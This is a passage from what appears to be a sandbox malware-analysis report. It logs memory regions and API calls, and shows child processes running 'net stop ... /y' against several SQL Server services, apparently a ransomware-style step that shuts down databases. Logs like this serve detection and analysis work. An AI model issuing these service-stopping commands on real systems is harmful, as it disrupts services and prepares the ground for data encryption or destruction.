"samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10537 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10538 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10539 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10540 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10541 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10542 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10543 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10544 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10545 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10546 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10547 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10548 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10549 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 788 os_tid = 0x12b8 [0112.363] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcd0 | out: lpSystemTimeAsFileTime=0x1cfcd0*(dwLowDateTime=0xf81f2ff0, dwHighDateTime=0x1d48689)) [0112.363] GetCurrentProcessId () returned 0x1174 [0112.363] GetCurrentThreadId () returned 0x12b8 [0112.363] GetTickCount () returned 0x25caf [0112.363] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcd8 | out: lpPerformanceCount=0x1cfcd8*=1815928100000) returned 1 [0112.364] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0112.364] __set_app_type (_Type=0x1) [0112.364] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0112.364] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0112.364] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.364] GetConsoleOutputCP () returned 0x1b5 [0112.365] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0112.365] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0112.366] sprintf_s (in: _DstBuf=0x1cfc78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0112.367] setlocale (category=0, locale=".437") returned="English_United States.437" [0112.368] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.368] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0112.368] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPSAMA /y" [0112.368] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cfa10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0112.368] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0112.368] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc68 | out: Buffer=0x1cfc68*=0x2b4d50) returned 0x0 [0112.368] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc68 | out: Buffer=0x1cfc68*=0x2bc100) returned 0x0 [0112.368] _fileno (_File=0x7fefdba2a80) returned 0 [0112.368] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0112.369] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0112.369] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0112.369] _wcsicmp (_String1="config", _String2="stop") returned -16 [0112.369] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0112.369] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0112.369] _wcsicmp (_String1="file", _String2="stop") returned -13 [0112.369] _wcsicmp (_String1="files", _String2="stop") returned -13 [0112.369] _wcsicmp (_String1="group", _String2="stop") returned -12 [0112.369] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0112.369] _wcsicmp (_String1="help", _String2="stop") returned -11 [0112.369] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0112.369] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0112.369] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0112.369] _wcsicmp (_String1="session", _String2="stop") returned -15 [0112.369] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0112.369] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0112.369] _wcsicmp (_String1="share", _String2="stop") returned -12 [0112.369] _wcsicmp (_String1="start", _String2="stop") returned -14 [0112.369] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0112.369] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0112.369] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0112.369] _wcsicmp (_String1="accounts", _String2="SQLAgent$TPSAMA") returned -18 [0112.369] _wcsicmp (_String1="computer", _String2="SQLAgent$TPSAMA") returned -16 [0112.369] _wcsicmp (_String1="config", _String2="SQLAgent$TPSAMA") returned -16 [0112.369] _wcsicmp (_String1="continue", _String2="SQLAgent$TPSAMA") returned -16 [0112.369] _wcsicmp (_String1="cont", _String2="SQLAgent$TPSAMA") returned -16 [0112.369] _wcsicmp (_String1="file", _String2="SQLAgent$TPSAMA") returned -13 [0112.369] _wcsicmp (_String1="files", _String2="SQLAgent$TPSAMA") returned -13 [0112.369] _wcsicmp (_String1="group", _String2="SQLAgent$TPSAMA") returned -12 [0112.369] _wcsicmp (_String1="groups", _String2="SQLAgent$TPSAMA") returned -12 [0112.369] _wcsicmp (_String1="help", _String2="SQLAgent$TPSAMA") returned -11 [0112.369] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$TPSAMA") returned -11 [0112.369] _wcsicmp (_String1="localgroup", _String2="SQLAgent$TPSAMA") returned -7 [0112.369] _wcsicmp (_String1="pause", _String2="SQLAgent$TPSAMA") returned -3 [0112.370] _wcsicmp (_String1="session", _String2="SQLAgent$TPSAMA") returned -12 [0112.370] _wcsicmp (_String1="sessions", _String2="SQLAgent$TPSAMA") returned -12 [0112.370] _wcsicmp (_String1="sess", _String2="SQLAgent$TPSAMA") returned -12 [0112.370] _wcsicmp (_String1="share", _String2="SQLAgent$TPSAMA") returned -9 [0112.370] _wcsicmp (_String1="start", _String2="SQLAgent$TPSAMA") returned 3 [0112.370] _wcsicmp (_String1="stats", _String2="SQLAgent$TPSAMA") returned 3 [0112.370] _wcsicmp (_String1="statistics", _String2="SQLAgent$TPSAMA") returned 3 [0112.370] _wcsicmp (_String1="stop", _String2="SQLAgent$TPSAMA") returned 3 [0112.370] _wcsicmp (_String1="time", _String2="SQLAgent$TPSAMA") returned 1 [0112.370] _wcsicmp (_String1="user", _String2="SQLAgent$TPSAMA") returned 2 [0112.370] _wcsicmp (_String1="users", _String2="SQLAgent$TPSAMA") returned 2 [0112.370] _wcsicmp (_String1="msg", _String2="SQLAgent$TPSAMA") returned -6 [0112.370] _wcsicmp (_String1="messenger", _String2="SQLAgent$TPSAMA") returned -6 [0112.370] _wcsicmp (_String1="receiver", _String2="SQLAgent$TPSAMA") returned -1 [0112.370] _wcsicmp (_String1="rcv", _String2="SQLAgent$TPSAMA") returned -1 [0112.370] _wcsicmp (_String1="netpopup", _String2="SQLAgent$TPSAMA") returned -5 [0112.370] _wcsicmp (_String1="redirector", _String2="SQLAgent$TPSAMA") returned -1 [0112.370] _wcsicmp (_String1="redir", _String2="SQLAgent$TPSAMA") returned -1 [0112.370] _wcsicmp (_String1="rdr", _String2="SQLAgent$TPSAMA") returned -1 [0112.370] _wcsicmp (_String1="workstation", _String2="SQLAgent$TPSAMA") returned 4 [0112.370] _wcsicmp (_String1="work", _String2="SQLAgent$TPSAMA") returned 4 [0112.370] _wcsicmp (_String1="wksta", _String2="SQLAgent$TPSAMA") returned 4 [0112.370] _wcsicmp (_String1="prdr", _String2="SQLAgent$TPSAMA") returned -3 [0112.370] _wcsicmp (_String1="devrdr", _String2="SQLAgent$TPSAMA") returned -15 [0112.370] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$TPSAMA") returned -7 [0112.370] _wcsicmp (_String1="server", _String2="SQLAgent$TPSAMA") returned -12 [0112.370] _wcsicmp (_String1="svr", _String2="SQLAgent$TPSAMA") returned 5 [0112.370] _wcsicmp (_String1="srv", _String2="SQLAgent$TPSAMA") returned 1 [0112.370] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$TPSAMA") returned -7 [0112.370] _wcsicmp (_String1="alerter", _String2="SQLAgent$TPSAMA") returned -18 [0112.370] _wcsicmp (_String1="netlogon", _String2="SQLAgent$TPSAMA") returned -5 [0112.370] _wcsupr (in: _String="SQLAgent$TPSAMA" | out: _String="SQLAGENT$TPSAMA") returned="SQLAGENT$TPSAMA" [0112.371] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2bce10 [0112.374] GetServiceKeyNameW (in: hSCManager=0x2bce10, lpDisplayName="SQLAGENT$TPSAMA", lpServiceName=0xff725750, lpcchBuffer=0x1cfb88 | out: lpServiceName="", lpcchBuffer=0x1cfb88) returned 0 [0112.375] _wcsicmp (_String1="msg", _String2="SQLAGENT$TPSAMA") returned -6 [0112.375] _wcsicmp (_String1="messenger", _String2="SQLAGENT$TPSAMA") returned -6 [0112.375] _wcsicmp (_String1="receiver", _String2="SQLAGENT$TPSAMA") returned -1 [0112.375] _wcsicmp (_String1="rcv", _String2="SQLAGENT$TPSAMA") returned -1 [0112.375] _wcsicmp (_String1="redirector", _String2="SQLAGENT$TPSAMA") returned -1 [0112.375] _wcsicmp (_String1="redir", _String2="SQLAGENT$TPSAMA") returned -1 [0112.375] _wcsicmp (_String1="rdr", _String2="SQLAGENT$TPSAMA") returned -1 [0112.375] _wcsicmp (_String1="workstation", _String2="SQLAGENT$TPSAMA") returned 4 [0112.375] _wcsicmp (_String1="work", _String2="SQLAGENT$TPSAMA") returned 4 [0112.375] _wcsicmp (_String1="wksta", _String2="SQLAGENT$TPSAMA") returned 4 [0112.375] _wcsicmp (_String1="prdr", _String2="SQLAGENT$TPSAMA") returned -3 [0112.375] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$TPSAMA") returned -15 [0112.375] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$TPSAMA") returned -7 [0112.375] _wcsicmp (_String1="server", _String2="SQLAGENT$TPSAMA") returned -12 [0112.375] _wcsicmp (_String1="svr", _String2="SQLAGENT$TPSAMA") returned 5 [0112.375] _wcsicmp (_String1="srv", _String2="SQLAGENT$TPSAMA") returned 1 [0112.375] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$TPSAMA") returned -7 [0112.375] _wcsicmp (_String1="alerter", _String2="SQLAGENT$TPSAMA") returned -18 [0112.375] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$TPSAMA") returned -5 [0112.375] NetServiceControl (in: servername=0x0, service="SQLAGENT$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x1cfb90 | out: bufptr=0x1cfb90) returned 0x889 [0112.376] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0112.376] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0112.377] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0112.378] GetFileType (hFile=0xb) returned 0x2 [0112.415] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa58 | out: lpMode=0x1cfa58) returned 1 [0112.416] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cfa50, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x1cfa50*=0x1e) returned 1 [0112.416] GetFileType (hFile=0xb) returned 0x2 [0112.416] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa58 | out: lpMode=0x1cfa58) returned 1 [0112.417] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa50, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x1cfa50*=0x2) returned 1 [0112.417] _ultow (in: _Dest=0x889, _Radix=1899200 | out: _Dest=0x889) returned="2185" [0112.417] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0112.417] GetFileType (hFile=0xb) returned 0x2 [0112.417] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa58 | out: lpMode=0x1cfa58) returned 1 [0112.417] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cfa50, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x1cfa50*=0x34) returned 1 [0112.418] GetFileType (hFile=0xb) returned 0x2 [0112.418] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa58 | out: lpMode=0x1cfa58) returned 1 [0112.418] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa50, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x1cfa50*=0x2) returned 1 [0112.418] NetApiBufferFree (Buffer=0x2b4d50) returned 0x0 [0112.418] NetApiBufferFree (Buffer=0x2bc100) returned 0x0 [0112.418] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPSAMA /y" [0112.418] exit (_Code=2) Process: id = "291" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6af33000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10550 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10551 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10552 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10553 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10554 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10555 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10556 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10557 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10558 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10559 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10560 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 10561 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10562 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 10563 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10564 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10595 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10596 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10597 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10598 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 10599 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 10600 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10601 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10602 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 10603 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 10604 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 10605 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10606 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10607 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10608 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10609 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10610 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10611 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10612 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10613 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10614 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 789 os_tid = 0x12e8 Process: id = "292" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x64053000" os_pid = "0x12a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLSafeOLRService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10565 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10566 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10567 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10568 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10569 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10570 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10571 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10572 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10573 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10574 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10575 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 10576 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10577 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 10578 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10579 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 791 os_tid = 0x1194 Process: id = "293" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x68473000" os_pid = "0x8b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLSERVERAGENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10581 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10582 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10583 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10584 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10585 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10586 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type 